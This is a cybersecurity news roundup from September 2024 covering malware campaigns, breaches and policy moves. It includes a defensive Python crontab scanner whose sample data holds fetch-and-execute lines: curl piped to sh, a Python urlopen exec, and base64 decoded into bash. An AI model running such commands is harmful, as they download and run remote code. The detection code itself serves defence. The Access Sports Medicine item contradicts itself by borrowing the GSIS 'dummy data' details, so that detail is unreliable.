What are the latest cybersecurity alerts, incidents, and news?
Linux, Oracle, WebLogic, Cryptocurrency, Mining, Android, Malware, Ajina Banker, Financial Data, 2FA Evasion, Iran, OilRig, Iraq, Government, Malware Campaign, Vo1d, Android TV, SolarWinds, ARM, Authentication Bypass, Remote Code Execution, Hulu, Password Resets, Unauthorized Access, Russia, Taiwan, Japan, Logistics Company, Kantsu, Cyberattack, Philippines, Government Service Insurance System, Breach, Access Sports Medicine, Personal Health Information, Leak, Pentagon, GPS Modernization, Chip Shortages, Cybersecurity, Guidance, US, Department of Labor, UK, Data Centers, Critical Infrastructure, Mastercard, Recorded Future, Acquisition, Lehigh Valley Health Network, Ransomware Attack, Lawsuit
Cyber Alerts
A new malware campaign targeting Linux environments has been uncovered, exploiting Oracle WebLogic servers to deploy cryptocurrency mining software and a DDoS botnet. The malware, named Hadooken, drops Tsunami (aka Kaiten), a well-known botnet, while also running a cryptocurrency miner. The attack leverages known vulnerabilities and weak credentials to gain initial access, then retrieves the malware through Python and shell script payloads fetched from remote servers. Hadooken spreads further by harvesting SSH credentials to move laterally across connected systems, and it establishes persistence through cron jobs so the crypto miner keeps running.
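As an added defender-side illustration (not code from the original article, and not Hadooken's real indicators), the check below parses crontab entries and flags the fetch-and-execute persistence pattern described above: remote scripts piped into a shell, Python one-liners that pull code over HTTP, or embedded payloads decoded into a shell. The sample crontab and the addresses in it are constructed.

```python
import re

# Constructed sample crontab (illustrative only; addresses are documentation ranges).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://198.51.100.7/payload.sh | sh
@reboot /usr/bin/python3 -c "import urllib.request;exec(urllib.request.urlopen('http://203.0.113.9/x.py').read())"
*/10 * * * * echo d2hvYW1p | base64 -d | bash
30 2 * * 0 /opt/backup/run.sh
"""

# Patterns for the behaviours the article describes: a script fetched from a
# remote server and executed directly, or a payload decoded straight into a shell.
SUSPICIOUS_PATTERNS = {
    "remote-fetch-pipe-shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
    "python-remote-exec": re.compile(r"python[0-9.]*\s+-c\s+.*urlopen"),
    "base64-decode-to-shell": re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba)?sh\b"),
}


def parse_crontab(text):
    """Return (schedule, command) tuples, skipping comments and blank lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @reboot, @daily, ... shorthand schedules
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)  # five schedule fields, then the command
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        entries.append((sched, cmd))
    return entries


def flag_suspicious(text):
    """Return (schedule, command, reason) for each entry matching a pattern."""
    findings = []
    for sched, cmd in parse_crontab(text):
        for reason, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(cmd):
                findings.append((sched, cmd, reason))
                break  # report the first matching reason per entry
    return findings


if __name__ == "__main__":
    for sched, cmd, reason in flag_suspicious(SAMPLE_CRONTAB):
        print(f"[{reason}] {sched} -> {cmd}")
```

On a real host the same functions can be run over `/etc/crontab`, `/etc/cron.d/*` and each user's crontab; the patterns are a starting point, not a complete signature.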
A new Android malware strain, Ajina.Banker, has emerged, targeting bank customers in Central Asia with the intent of stealing financial data and bypassing two-factor authentication (2FA). Discovered by Group-IB in May 2024, Ajina.Banker spreads through Telegram channels disguised as legitimate apps for banking, payment systems, and government services. Once installed, the malware accesses SMS messages, phone number APIs, and cellular network information to exfiltrate sensitive data.
Iranian cyber group OilRig has launched a sophisticated malware campaign against Iraqi government networks, including the Prime Minister’s Office and the Ministry of Foreign Affairs. Known also as APT34, Crambus, and several other aliases, OilRig is linked to Iran’s Ministry of Intelligence and Security (MOIS) and has a history of conducting phishing attacks and deploying custom backdoors. The latest campaign employs new malware families, Veaty and Spearal, which use command-and-control mechanisms such as DNS tunneling and compromised email accounts.
Cybersecurity experts at Doctor Web have uncovered a widespread malware campaign targeting Android-based TV boxes, identified as Android.Vo1d. This malware has compromised nearly 1.3 million devices across 197 countries, making it one of the most extensive infections of its kind. Vo1d operates as a backdoor, allowing attackers to secretly install malicious software by altering critical system files. Initially detected in August 2024, Vo1d affects various models, including those running outdated Android versions, and disguises itself by mimicking legitimate system processes.
SolarWinds has disclosed critical vulnerabilities in its Access Rights Manager (ARM) platform, identified as CVE-2024-28990 and CVE-2024-28991. The first vulnerability allows attackers to bypass authentication via hard-coded credentials, potentially granting unauthorized access to the RabbitMQ management console. The second, more severe issue enables remote code execution through deserialization of untrusted data and poses a significant risk if exploited by authenticated users.
Cyber Incidents
Hulu has issued a forced password reset for 296 accounts following unauthorized access detected on September 11, 2024. The breach, attributed to list-based account hacking (credential stuffing), did not stem from a leak of Hulu’s own account information but rather from passwords compromised elsewhere and reused on Hulu. Affected users may have had their viewing preferences, account details, and limited payment information accessed. Hulu has responded by restricting access from the origin IP address and initiating password resets. Users are advised to reset their passwords via a link sent to their registered email.
A pro-Russia hacker group known as NoName057 has launched a distributed denial-of-service (DDoS) attack on Taiwanese government websites in retaliation for recent comments made by President William Lai. The attack targeted several local tax bureaus in New Taipei City, Keelung, Hsinchu, and Taoyuan, causing temporary outages. This action appears to be a response to Lai’s suggestion that China should address its territorial disputes with Russia, a stance perceived as a challenge to Beijing’s geopolitical ambitions.
Kantsu Co., Ltd., a Japanese logistics company, has reported a significant system outage caused by a cyberattack. The incident, identified around 6:00 p.m. on September 12, 2024, involved ransomware that compromised some of the company’s servers. Following the breach, Kantsu swiftly disconnected its network to prevent further damage and established an emergency response team. The company has notified the relevant authorities and engaged external security experts to investigate the attack and assess the damage.
The Government Service Insurance System (GSIS) in the Philippines has confirmed a cybersecurity breach involving a local threat actor. On September 12, 2024, GSIS was alerted by its security partner to a compromise of an administrator account on one of its test computers. The breach was publicly disclosed by the threat actor on social media. The affected computer contained only dummy data used for testing purposes, and it has been taken offline as part of the ongoing investigation. GSIS is validating the claims of the intruder and is taking measures to safeguard its systems and ensure compliance with the Data Privacy Act.
Access Sports Medicine & Orthopaedics recently announced a significant cybersecurity incident involving unauthorized access to its network. Detected on May 10, 2024, the breach was traced to a local threat actor who compromised a test computer containing dummy data. However, further investigation revealed that personal health information (PHI) of some individuals was exposed. The compromised data may include names, dates of birth, medical details, Social Security numbers, health insurance information, and limited financial data.
Cyber News
The U.S. Department of Defense is facing significant delays in its GPS modernization efforts due to ongoing chip shortages and development challenges, according to a recent Government Accountability Office (GAO) report. The Space Force, responsible for upgrading the Global Positioning System (GPS) with more secure M-code technology, is struggling to meet its 2025 deadline amid setbacks in software development and testing. The report highlights that these delays jeopardize the Pentagon’s goal of maintaining a constellation of 24 operational M-code satellites through the 2030s.
The U.S. Department of Labor (DOL) has updated its cybersecurity guidance for pension and health and welfare plans in Compliance Assistance Release No. 2024-01. The revised documents now encompass health and welfare plans, broadening the scope of the original 2021 guidance. Key updates include enhanced recommendations for hiring service providers, emphasizing the need to confirm cyber insurance coverage. The updated best practices include more detailed advice on multi-factor authentication (MFA), recommending phishing-resistant MFA and timely notifications to participants in case of data breaches.
In a significant move, the UK government has officially designated data centers as critical national infrastructure. This classification highlights the essential role these facilities play in supporting the nation’s digital economy and maintaining vital services. By recognizing data centers as critical infrastructure, the government aims to bolster their protection against potential cyber threats and other risks, ensuring they remain resilient and operational.
Mastercard has announced its acquisition of the threat intelligence firm Recorded Future for $2.65 billion. This strategic purchase aims to enhance Mastercard’s cybersecurity capabilities by integrating Recorded Future’s advanced threat intelligence into its services. The acquisition will bolster Mastercard’s efforts to provide greater protection and trust in digital transactions, addressing the escalating risks of cybercrime projected to cost $9.2 trillion in 2024.
Lehigh Valley Health Network (LVHN) has agreed to a $65 million settlement over a ransomware attack that exposed sensitive data and photos of cancer patients. The settlement resolves a lawsuit stemming from the breach, which affected around 135,000 individuals whose personal information was accessed by hackers. The breach highlighted significant vulnerabilities in data security and privacy, prompting LVHN to take substantial steps to address the damages and enhance its cybersecurity measures. This resolution marks a critical move in mitigating the impact of the attack and underscores the importance of robust data protection protocols.
Copyright © 2024 CyberMaterial. All Rights Reserved.